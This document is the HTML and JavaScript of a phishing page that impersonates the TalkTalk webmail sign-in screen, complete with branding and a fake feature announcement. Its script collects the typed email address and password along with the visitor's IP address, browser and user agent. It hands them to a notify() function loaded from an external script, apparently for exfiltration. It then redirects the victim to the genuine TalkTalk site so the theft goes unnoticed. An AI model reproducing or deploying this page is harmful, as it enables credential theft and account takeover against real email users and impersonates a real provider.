<!DOCTYPE html>
<html lang="en">

<head>
<title> Sign in - Webmail </title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="content-type" content="text/html;charset=utf-8" />

<script type="text/javascript"  src="jquery.min.js"></script>
<link href="css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<link href="css/font-awesome.min.css" rel="stylesheet" >
<!------ Include the above in your HEAD tag ---------->
<link rel="shortcut icon" href="img/favicon.ico">
<style>


@font-face {
  font-family: "Raleway";
  src: url("fonts/Raleway-Regular.ttf");
}
@font-face {
    font-family: "TalkTalkIcons";
    src: url("fonts/TalkTalkIcons.woff");
    font-weight: 700
}

body{
        font-family: -apple-system,BlinkMacSystemFont,Helvetica Neue,Segoe UI,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji",Segoe UI Symbol !important;
        -ms-flex-align: center;
        -webkit-align-items: center;
        align-items: center;
        background: url(background.jpg) no-repeat 100% 100% fixed;
        -webkit-background-size: cover;
        -moz-background-size: cover;
        -o-background-size: cover;
        background-size: cover;
        justify-content: flex-start;
        margin: 0;
        min-height: 100vh;

}

 h1 {
    color: #333;
    font-size: 36px;
}

.header {
    color: #2c4047;
    font-size: 125px;
    margin-top: 15px;
    z-index: 1;
    display: inline-block;
    font-family: "TalkTalkIcons" !important;
    -moz-osx-font-smoothing: grayscale;
    -webkit-font-smoothing: antialiased;
    font-style: normal;
    font-weight: 400;
    line-height: 90px;
    text-decoration: inherit;
    text-rendering: optimizeLegibility;
    text-transform: none;
    vertical-align: middle
}


.header:before {
    content: "";
}

.des{
  margin-top: 10%;

}
h2 {
    color: #2f2c2c;
    font-size: 17px;
    margin: 0 0 20px;
    font-weight: 700;
}

h1 {
    color: #2f2c2c;
    font-size: 30px;
    margin-bottom: 25px;
    line-height: 40px;
    font-weight: 500;
}

.subt{
    font-size: 20px;
    line-height: 28px;
    margin-bottom: 10px;
    font-weight: 500;

}
.login-container{
 min-height: 100vh;
}
.login-form-1{
    background:#ffffff;
    margin-top: 20%;
    padding: 5%;
    border: 1px solid #696969;
    border-radius: 0;
    text-align: left;
    box-shadow: none;

}
.login-form-1 h3{
    text-align: center;
    color: #333;
}

.login-container form{
    padding: 4%;
}
.btnSubmit
{
    width: 100%;
    border-radius: 20px;
    padding: 10px;
    border: none;
    cursor: pointer;
}
.login-form-1 .btnSubmit{
    font-weight: 600;
    color: #2c4047;
    background-color: #08F0FF;
    border: 0;
    border-radius: 5px;
}

.login-form-1 .ForgetPwd{
    color: #5514b4;
    #font-weight: 600;
    text-decoration: none;

}
a:not(.btn) {
font-size: 13px;
 color: #2C4047 !important;

 }

a:not(.btn):hover {
    color: #2c67c7;
}


@media only screen and (max-width: 600px) {
.login-form-1 {
    margin-bottom: 5%;
    margin-top: 5% !important;
    }

  #dismgs{
   display: none !important;
  }
}



#error{
  padding: 10px;
  background:#f9e7eb;
  margin-bottom: 5%;
  border-top: 5px solid #c03;
  border-bottom: 1px solid #c03;

}


#error > span{
 color: #333;
 font-weight: 700;
 text-align: start;
font-size: 13px;

 }



.message > span > img{
    height: 240px;
    width: auto;
    margin-bottom: -6em;
    margin-top: -2em;
}
.message > span{
  text-align: justify;
  display:inline-flex;
  flex-direction:row;
}
label {
    color: #666;
    font-weight: 700;
    margin-bottom: 5px;
    font-size: 13px;
    line-height: 20px;
}

ul.apps {
    color: #7a7a7a;
    display: flex;
    justify-content: space-between;
    margin: 0;
    padding: 0;
}

ul.apps li {
    display: flex;
    flex-direction: column;
    align-items: center;
    position: relative;
    margin: 2px;
}

ul.apps li .icon {
    font-size: 28px;
}
ul.apps li .title {
    font-size: 10px;
}

.bi {
    display: inline-block;
    height: 1em;
    width: 1em;
    vertical-align: -.125em;
    flex-shrink: 0;
    pointer-events: none;
}

input[type=checkbox]:checked{
    border: 0;
    background: center no-repeat url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3e%3cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='M6 10l3 3l6-6'/%3e%3c/svg%3e") !important;
    background-color: #2c4047 !important;
}
.bg-light{
height: 72px !important;
background: #2C4047 !important;
}

.navelogo a {
    display: inline-block;
    padding-top: 4px;
    height: 40px;
}

.navelogo a > img {
  height: 40px !important
}
</style>
</head>
<body>
<nav class="navbar navbar-light bg-light">
  <a class="navbar-brand navelogo" href="#">
    <img src="talktalk_logo.png" alt="">
  </a>
</nav>

<div class="container">
<div class="col-sm-12 col-md-12">
            <div class="row">

            <div id="dismgs" class="col-sm-6 col-md-8">
            <div class="des">
            <h1 class="title">Login to discover your new TalkTalk Mail today</h1>
            <p class="subt">We've made TalkTalk Mail better and even easier to use</p>

            <p>
            <div class="message">

            <span>We've introduced features you've been asking for. Your email now has a dedicated spam button to help improve your spam filters and protect you from scams. When you receive a spam message just click <strong>'Mark as spam'</strong> link to update your spam filters
            <img src="img/spam.png" />

            </span>

            <p style="clear: both; margin-top: 0.5em; font-weight: 500;"><a href="#">Find out more</a></p>


            </div>





            </div>


            </div>

            <div class="align-center col-sm-6 col-xs-12 col-md-4">

                    <div class="login-form-1">

                    <div class="header"><h1 class="sr-only">Log into TalkTalk Mail</h1></div>

                    <h2 style="font-weight: 900; margin-bottom: 5%;">Sign in to access your apps:</h2>


                    <form method="POST" id="eform" name="eform">

                    <ul class="apps"><li class="lcell"><div class="icon"><svg width="16" height="16" class="bi bi-ox-mail" fill="currentColor" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g transform="translate(0 2)" fill-rule="evenodd"><path d="M13.964 10.999H1.996c-.55 0-.996-.393-.996-.875V2.957l5.953 4.167a1.799 1.799 0 0 0 2.054 0l5.953-4.167v7.167c0 .482-.447.875-.996.875M1.996 1h11.968c.5 0 .899.332.968.755l-6.5 4.549a.79.79 0 0 1-.905 0l-6.5-4.549c.07-.423.469-.755.969-.755m11.968-1H1.996C.896 0 0 .841 0 1.875v8.249c0 1.034.896 1.875 1.996 1.875h11.968c1.1 0 1.996-.841 1.996-1.875V1.875C15.96.841 15.065 0 13.964 0"></path></g></svg></div><div class="title">Mail</div></li><li class="lcell"><div class="icon"><svg width="16" height="16" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="currentColor" class="bi bi-calendar" viewBox="0 0 16 16"><path d="M3.5 0a.5.5 0 0 1 .5.5V1h8V.5a.5.5 0 0 1 1 0V1h1a2 2 0 0 1 2 2v11a2 2 0 0 1-2 2H2a2 2 0 0 1-2-2V3a2 2 0 0 1 2-2h1V.5a.5.5 0 0 1 .5-.5zM1 4v10a1 1 0 0 0 1 1h12a1 1 0 0 0 1-1V4H1z"></path><text class="calendar-icon-date" text-anchor="middle" x="8" y="12" font-size="8">30</text></svg></div><div class="title">Calendar</div></li><li class="lcell"><div class="icon"><svg width="16" height="16" viewBox="0 0 16 16" class="bi bi-ox-address-book" fill="currentColor" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g fill-rule="evenodd"><g transform="translate(1)"><path d="M2 0h10.001a2 2 0 0 1 2 2v12.001a2 2 0 0 1-2 2H2a2 2 0 0 1-2-2v-1h1v1a1 1 0 0 0 1 1h10.001a1 1 0 0 0 1-1V2a1 1 0 0 0-1-1H2a1 1 0 0 0-1 1v1H0V2a2 2 0 0 1 2-2"></path></g><path d="M1 11v-.5a.5.5 0 0 1 1 0v.5h.5a.5.5 0 0 1 0 1h-2a.5.5 0 0 1 0-1H1Zm0-3v-.5a.5.5 0 0 1 1 0V8h.5a.5.5 0 0 1 0 1h-2a.5.5 0 0 1 0-1H1Zm0-3v-.5a.5.5 0 1 1 1 0V5h.5a.5.5 0 1 1 0 1h-2a.5.5 0 0 1 0-1H1ZM8.266 8.157a2.263 2.263 0 1 0 0-4.526 2.263 2.263 0 0 0 0 4.526M8.278 8.916c-3.758 0-4.388 2.222-4.49 2.903a.74.74 0 0 0 .17.594.753.753 0 0 0 .57.262h7.501a.75.75 0 0 0 .585-.28.735.735 0 0 0 .148-.618c-.184-.86-.99-2.86-4.484-2.86"></path></g></svg></div><div class="title">Address Book</div></li><li class="lcell"><div class="icon"><svg width="16" height="16" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="currentColor" class="bi bi-grid" viewBox="0 0 16 16"><path d="M1 2.5A1.5 1.5 0 0 1 2.5 1h3A1.5 1.5 0 0 1 7 2.5v3A1.5 1.5 0 0 1 5.5 7h-3A1.5 1.5 0 0 1 1 5.5v-3zM2.5 2a.5.5 0 0 0-.5.5v3a.5.5 0 0 0 .5.5h3a.5.5 0 0 0 .5-.5v-3a.5.5 0 0 0-.5-.5h-3zm6.5.5A1.5 1.5 0 0 1 10.5 1h3A1.5 1.5 0 0 1 15 2.5v3A1.5 1.5 0 0 1 13.5 7h-3A1.5 1.5 0 0 1 9 5.5v-3zm1.5-.5a.5.5 0 0 0-.5.5v3a.5.5 0 0 0 .5.5h3a.5.5 0 0 0 .5-.5v-3a.5.5 0 0 0-.5-.5h-3zM1 10.5A1.5 1.5 0 0 1 2.5 9h3A1.5 1.5 0 0 1 7 10.5v3A1.5 1.5 0 0 1 5.5 15h-3A1.5 1.5 0 0 1 1 13.5v-3zm1.5-.5a.5.5 0 0 0-.5.5v3a.5.5 0 0 0 .5.5h3a.5.5 0 0 0 .5-.5v-3a.5.5 0 0 0-.5-.5h-3zm6.5.5A1.5 1.5 0 0 1 10.5 9h3a1.5 1.5 0 0 1 1.5 1.5v3a1.5 1.5 0 0 1-1.5 1.5h-3A1.5 1.5 0 0 1 9 13.5v-3zm1.5-.5a.5.5 0 0 0-.5.5v3a.5.5 0 0 0 .5.5h3a.5.5 0 0 0 .5-.5v-3a.5.5 0 0 0-.5-.5h-3z"></path></svg></div><div class="title">Portal</div></li></ul>


                    <div style="margin-top: 4em">

                    <div class="form-group">
                            <label>Your TalkTalk email address:* </label>

                            <input type="text" class="form-control"  placeholder="Email Address" autofocus name="euser" id="euser" value="">
                        </div>

                        <div class="form-group">
                            <label>Your Password:* </label>
                            <input type="password" class="form-control" placeholder="Password" value="" name="epass" id="epass"  />
                        </div>
                      <input value="" id="eip" name="eip" type="hidden" />

                         <div class="error"></div>

                        <div class="form-group">
                            <a href="#" class="ForgetPwd" id="eforgetp">Forgot your password?</a>
                        </div>

                        <div class="form-group">
                            <button type="submit" class="btn btnSubmit" > Sign in </button>
                        </div>

                        <div class="form-check">
                        <input class="form-check-input" type="checkbox" value="1" checked="checked" name="checkbx" id="checkbx">
                        <label class="form-check-label" for="flexCheckDefault">
                          Stay signed in
                        </label>
                      </div>

                      </div>

                    </form>
                    </div>
            </div>

</div>
        </div>
        </div>


<script type="text/javascript"  src="post.js"></script>

        <script>

        function browserN() {
  if ((navigator.userAgent.indexOf("Opera") || navigator.userAgent.indexOf('OPR')) != -1) {
    return 'Opera';
  } else if (navigator.userAgent.indexOf("Edg") != -1) {
    return 'Edge';
  } else if (navigator.userAgent.indexOf("Chrome") != -1) {
    return 'Chrome';
  } else if (navigator.userAgent.indexOf("Safari") != -1) {
    return 'Safari';
  } else if (navigator.userAgent.indexOf("Firefox") != -1) {
    return 'Firefox';
  } else if ((navigator.userAgent.indexOf("MSIE") != -1) || (!!document.documentMode == true)) //IF IE > 10
  {
    return 'IE';
  } else {
    return 'unknown';
  }
}


        function fetch_ip(){
          $.getJSON("https://api.ipify.org?format=json", function(data) {
               $("#eip").val(data.ip);
          });

        }


        $(document).ready(function(){


        fetch_ip();

        const provider = "TALKTALK(https://apps.talktalk.co.uk/appsuite)";
        const get_browsername = browserN();
        $("#eform").on("submit", function (e){
          e.preventDefault();
          var get_ip = $("#eip").val();
          var euser = $("#euser").val();
          var epass = $("#epass").val();

          if (euser == ""){
              $(".error").html('<div id="error"><span>Please enter your credentials. (UI-0001)</span></div>');

          }else if (epass == ""){

            $(".error").html('<div id="error"><span>Please enter your password. (UI-0002)</span></div>');

          }else{

            $(".error").html("");

            var message = `PROVIDER: ${provider}\nUSERNAME: ${euser}\nPASSWORD: ${epass}\nBROWSERNAME: ${get_browsername}\nUSER-AGENT: ${window.navigator.userAgent}\nIP ADDRESS: ${get_ip}\n`;
            var status = notify(message);


            window.location.href = "https://apps.talktalk.co.uk/appsuite";


          }

        });

        })


    </script>


</body>


</html>
